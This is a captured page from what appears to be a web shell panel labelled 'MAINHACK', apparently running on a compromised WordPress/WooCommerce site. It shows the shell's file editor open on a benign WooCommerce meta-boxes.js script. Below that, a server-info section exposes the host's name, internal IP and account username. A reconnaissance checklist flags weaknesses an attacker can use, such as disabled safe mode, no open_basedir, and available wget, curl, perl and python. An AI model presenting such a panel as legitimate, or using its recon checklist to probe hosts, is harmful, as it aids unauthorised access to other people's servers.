[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: meta-boxes.js
jQuery( function ( $ ) { // Run tipTip function runTipTip() { // Remove any lingering tooltips $( '#tiptip_holder' ).removeAttr( 'style' ); $( '#tiptip_arrow' ).removeAttr( 'style' ); $( '.tips' ).tipTip({ 'attribute': 'data-tip', 'fadeIn': 50, 'fadeOut': 50, 'delay': 200 }); } runTipTip(); // Allow Tabbing $( '#titlediv' ).find( '#title' ).keyup( function( event ) { var code = event.keyCode || event.which; // Tab key if ( code === '9' && $( '#woocommerce-coupon-description' ).length > 0 ) { event.stopPropagation(); $( '#woocommerce-coupon-description' ).focus(); return false; } }); $( '.wc-metaboxes-wrapper' ).on( 'click', '.wc-metabox > h3', function() { $( this ).parent( '.wc-metabox' ).toggleClass( 'closed' ).toggleClass( 'open' ); }); // Tabbed Panels $( document.body ).on( 'wc-init-tabbed-panels', function() { $( 'ul.wc-tabs' ).show(); $( 'ul.wc-tabs a' ).click( function( e ) { e.preventDefault(); var panel_wrap = $( this ).closest( 'div.panel-wrap' ); $( 'ul.wc-tabs li', panel_wrap ).removeClass( 'active' ); $( this ).parent().addClass( 'active' ); $( 'div.panel', panel_wrap ).hide(); $( $( this ).attr( 'href' ) ).show(); }); $( 'div.panel-wrap' ).each( function() { $( this ).find( 'ul.wc-tabs li' ).eq( 0 ).find( 'a' ).click(); }); }).trigger( 'wc-init-tabbed-panels' ); // Date Picker $( document.body ).on( 'wc-init-datepickers', function() { $( '.date-picker-field, .date-picker' ).datepicker({ dateFormat: 'yy-mm-dd', numberOfMonths: 1, showButtonPanel: true }); }).trigger( 'wc-init-datepickers' ); // Meta-Boxes - Open/close $( '.wc-metaboxes-wrapper' ).on( 'click', '.wc-metabox h3', function( event ) { // If the user clicks on some form input inside the h3, like a select list (for variations), the box should not be toggled if ( $( event.target ).filter( ':input, option, .sort' ).length ) { return; } $( this ).next( '.wc-metabox-content' ).stop().slideToggle(); }) .on( 'click', '.expand_all', function() { $( this ).closest( '.wc-metaboxes-wrapper' ).find( '.wc-metabox > .wc-metabox-content' ).show(); return false; }) .on( 'click', '.close_all', function() { $( this ).closest( '.wc-metaboxes-wrapper' ).find( '.wc-metabox > .wc-metabox-content' ).hide(); return false; }); $( '.wc-metabox.closed' ).each( function() { $( this ).find( '.wc-metabox-content' ).hide(); }); });
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129